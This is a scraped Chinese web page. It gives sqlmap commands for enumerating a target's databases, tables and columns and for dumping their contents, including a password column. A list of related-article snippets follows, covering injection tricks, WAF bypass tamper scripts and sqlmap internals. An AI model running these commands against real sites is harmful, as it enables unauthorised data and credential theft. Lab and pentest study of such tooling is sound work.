sqlmap注入检测

1、列出可利用数据库:

sqlmap  -u  url  --dbs

2、列出某个数据库中表:

sqlmap  -u  url   --tables  -D  south

sqlmap  -u  url  --dump   -T   t_users   -D   south

3、列出某个数据库中某个表的字段:

sqlmap  -u  url   --columns  -T  member  -D  south

4、列出某个数据库中某个表的某个字段:

sqlmap  -u  url   --dump  -C  id  -T  member  -D  south

sqlmap  -u  url   --dump  -C  password  -T  member  -D  south

5、复制某个数据库:

sqlmap  -u  url   --dump  –D  south

遇到问题,一路回车

6、复制全部数据库:

sqlmap   -u  url   --dump-all

与5同理

遇到问题,一路回车

PS:-D:数据库,-T:数据库中表,-C:数据库中表的字段,--dump:复制

时间: 2024-11-08 07:38:31

sqlmap注入检测的相关文章

sqlmap注入检测经验0x01

某日偶遇一SQLInjection Point,MSSQL 2008,已开启显错模式. 马上扔进SQLMap跑,一路顺畅,竟然还是SA的权限,心想运气真好,无论如何都拿定了. 数据库,表,列都列出来了,但是上–dump参数就死活跑不出来. 报错 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’”——x是马赛克哈:) 心想应该很容易搞定,遂查找手工注入方法,测试无果. 还是回到SQ

SQLmap注入启发式检测算法

1.经过setTargetEnv()就进入了checkWaf()的环节 def checkWaf():     """     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse     """     if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offli

sqlmap注入总结

本实验是基于DVWA和sqli-labs的实验环境 实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下.安装只要注意Wamp环境的数据库名和密码即可. sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-labs. sqlmap里涉及到的有关HTTP头,请参考http://wt7315.blog.51cto.com/1031965

Sqlmap注入技巧集锦

当我们注射的时候,判断注入 http://site/script?id=10 http://site/script?id=11-1 # 相当于 id=10 http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤 http://site/script?id=10– # 失败 http://site/script?id=10;– #失败 http://sit

Sqlmap注入技巧收集整理

TIP1 当我们注射的时候,判断注入 http://site/script?id=10http://site/script?id=11-1 # 相当于 id=10http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤http://site/script?id=10– # 失败http://site/script?id=10;– #失败http://sit

sqlmap注入技巧收集

收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎接楼补充.分享. TIP1 当我们注射的时候,判断注入 http://site/script?id=10 http://site/script?id=11-1 # 相当于 id=10 http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤 http://s

在windows系统和kali中通过sqlmap注入

第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Python编写,所以需要在系统中先安装好2.7.x版本的Python,然后将下载好的sqlmap放在Python2.7目录下,这里Python安装我就不一一截图了,因为都是使用默认安装,只是安装的时候根据需要可以修改下安装路径. 在Windows下首先把下载好的sqlmap放在Python路径下 然后我

使用sqlmap注入DVWA的SQL Injection菜单

1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用admin/password登陆系统,通过firebug工具获取cookie信息. 得到的cookie信息如下: security=low; path=/dvwa/; domain=192.168.0.112 PHPSESSID=0bec860709d15f590768b7713c69b52f; pa

Sqlmap注入Base64编码的注入点

不小心删了,找快照才找到的.补回来... 上次遇到一个Base64的注入点,手工注入太麻烦,于是在网上看了一下sqlmap Base64注入的方法,如下: sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称” 其中常用到的bypass脚本绕过SQLMAP主要两个脚本:space2ha